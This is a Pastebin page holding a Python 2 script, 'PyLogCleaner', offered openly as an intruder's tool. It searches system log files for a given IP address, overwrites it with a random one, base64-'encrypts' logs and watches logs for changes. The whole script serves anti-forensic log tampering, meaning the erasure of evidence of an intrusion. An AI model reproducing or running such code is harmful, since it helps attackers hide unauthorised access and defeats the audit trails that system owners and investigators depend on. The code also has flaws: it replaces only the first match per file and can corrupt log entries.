API tools faq
paste
Advertisement
salAnon

Python Logcleaner

salAnon
Feb 18th, 2012
694
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.09 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #PyLogcleaner uses the list given (logfiles) containing
  3. # 274 logfiles and uses the linux find
  4. #cmd to try and locate more logfiles to search
  5. #for an ip address to replace with a random generated
  6. #one. It can also encrypt/d3crypt a
  7. #logfile and also can watch a logfile for modifications.
  8.  
  9.  
  10. import os, sys, time, pwd, getopt, re, random, StringIO, commands
  11.  
  12. def title():
  13.     print "\n   PyLogCleaner v1.0"
  14.     print "-----------------------------------------------"
  15.  
  16. def usage():
  17.     title()
  18.     print "\n  Usage: python logcleaner.py <option>\n"
  19.     print "\t[options]"
  20.     print "\t   -i <ip>: Ip to search for and replace"
  21.     print "\t   -e <file>: Encrypts logfile"
  22.     print "\t   -d <file>: Decrypts logfile"
  23.     print "\t   -w/-watch <file> <time to check> : Watches logfile for modification"
  24.     print "\t   -h/-help: Prints this menu\n"
  25.  
  26. def timer():
  27.     now = time.localtime(time.time())
  28.     return time.asctime(now)
  29.  
  30. def validater(logs):
  31.    
  32.     activeLogs = []
  33.  
  34.     print "[+] Validating:",len(logs),"logfiles\n"
  35.     for l in logs:
  36.         if os.path.isfile(l) == True:
  37.             activeLogs.append(l)
  38.     if len(activeLogs)>0:
  39.         print "[+] Active Logs Found:",len(activeLogs)
  40.         return activeLogs
  41.     else:
  42.         print "[-] No Active Logs Found"
  43.         sys.exit(1)
  44.        
  45. def search(logfiles):
  46.    
  47.     print "\n[+] Searching:",ip,"\n"
  48.     import mmap
  49.    
  50.     for file in logfiles:
  51.         try:
  52.             f = open(file, "rb+")
  53.             size = os.path.getsize(file)
  54.             if size >= 1:
  55.                 data = mmap.mmap(f.fileno(), size)
  56.                 loc = data.find(ip)
  57.                 #Lets not search a file with no data.
  58.                 if loc == -1:
  59.                     #print "[+] File:",file,"|",size,"bytes"
  60.                     #print "\t[-] IP not found"
  61.                     data.close()
  62.                 else:
  63.                     print "-"*45
  64.                     print "[+] File:",file,"|",size,"bytes"
  65.                     print "\t[+] IP found"
  66.                     data.seek(loc)
  67.                     data.write(randip)
  68.                     print "[+] Replaced: ",ip,">>",randip
  69.                     print "[+] New_Size:",os.path.getsize(file),"bytes"
  70.                     print "-"*45
  71.                     data.close()
  72.         except(IOError), msg:
  73.             pass
  74.     print "\n[+] Done:",timer(),"\n"
  75.                    
  76. def findlogs():
  77.     os.chdir("/")
  78.    
  79.     print "[+] Finding More Logfiles..."
  80.     #Lets use the linux find cmd to fing more files containing log...
  81.     logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()
  82.     if len(logz)>0:
  83.         print "[+] Found:",len(logz),"extra logfiles"
  84.         for log in logz:
  85.             if re.search("Permission denied",log) == None:
  86.                 logs.append(log[:-1])
  87.     return logs
  88.    
  89. def randip():
  90.    
  91.     A = random.randrange(255) + 1
  92.     B = random.randrange(255) + 1
  93.     C = random.randrange(255) + 1
  94.     D = random.randrange(255) + 1
  95.     randip = "%d.%d.%d.%d" % (A,B,C,D)
  96.     return randip
  97.  
  98. def gettime():
  99.     clock = time.asctime(time.localtime(os.path.getmtime(logfile)))
  100.     return clock
  101.  
  102. def getsize():
  103.     size = os.path.getsize(logfile)
  104.     return size
  105.  
  106. def modlast(logfile):
  107.     try:
  108.         sys.argv[3]
  109.     except(IndexError):
  110.         print "\n[-] Need a time in seconds (ex: 60)\n"
  111.         sys.exit(1)
  112.        
  113.     print "[+] Analyzing:",logfile
  114.     print "[+] Time:",sys.argv[3],"secs"
  115.     print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]
  116.     print "[+] Size:",getsize(),"bytes"
  117.     print "[+] Last Modified:",gettime()
  118.     print "[+] Starting:",timer()
  119.  
  120.     old_time = gettime()
  121.     while True:
  122.         time.sleep(int(sys.argv[3]))
  123.         new_time = gettime()
  124.         if new_time != old_time:
  125.             print "\n[+] File Modified:",new_time
  126.             print "[+] New Size:",getsize(),"bytes\n"
  127.             old_time = new_time
  128.    
  129. def encrypter(file):
  130.     import base64
  131.     print "\n[+] Encrypting:",file
  132.     print "[+] Size:",os.path.getsize(file),"bytes"
  133.     try:
  134.         log2encode = open(file, "r").read()
  135.     except(IOError):
  136.         print "Error: Check your full path.\n"
  137.         sys.exit(1)
  138.     log2encode = base64.b64encode(log2encode)
  139.     os.remove(file)
  140.     time.sleep(2)
  141.     f = open(file, "a")
  142.     f.write(log2encode)
  143.     f.close()
  144.     print "[+] NewSize:",os.path.getsize(file),"bytes"
  145.     print "[+] Done\n"
  146.  
  147. def d3crypter(file):
  148.     import base64
  149.     print "\n[+] Decrypting:",file
  150.     print "[+] Size:",os.path.getsize(file),"bytes"
  151.     try:
  152.         b2log = open(file, "r").read()
  153.     except(IOError):
  154.         print "Error: Check your full path.\n"
  155.         sys.exit(1)
  156.     b2log = base64.b64decode(b2log)
  157.     os.remove(file)
  158.     time.sleep(2)
  159.     f = open(file, "a")
  160.     f.write(b2log)
  161.     f.close()
  162.     print "[+] NewSize:",os.path.getsize(file),"bytes"
  163.     print "[+] Done\n"
  164.  
  165. if len(sys.argv) <= 1:
  166.     usage()
  167.     sys.exit(1)
  168. if len(sys.argv) == 2:
  169.     usage()
  170.     sys.exit(1)
  171.  
  172. if sys.argv[1] == "-w" or sys.argv[1] == "-watch":
  173.     logfile = sys.argv[2]
  174.     if os.path.isfile(logfile) == False:
  175.         title()
  176.         print "\n[-] Cannot Open File, Check Full Path!!!\n"
  177.         sys.exit(1)
  178.     else:
  179.         title()
  180.         modlast(logfile)
  181. if sys.argv[1] == "-i":
  182.     ip = sys.argv[2]       
  183.     try:
  184.         logs = open("logfiles", "r").readlines()
  185.     except(IOError):
  186.         print "Error: logfiles missing\n"
  187.         sys.exit(1)
  188.     title()
  189.     print "\n[+] Starting:",timer()
  190.     print "[+] Loaded:",len(logs),"logs"
  191.     findlogs()
  192.     randip = randip()
  193.     print "[+] Generate Random IP:",randip
  194.     search(validater(logs))
  195. if sys.argv[1] == "-e":
  196.     file = sys.argv[2]
  197.     title()
  198.     encrypter(file)
  199. if sys.argv[1] == "-d":
  200.     file = sys.argv[2]
  201.     title()
  202.     d3crypter(file)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!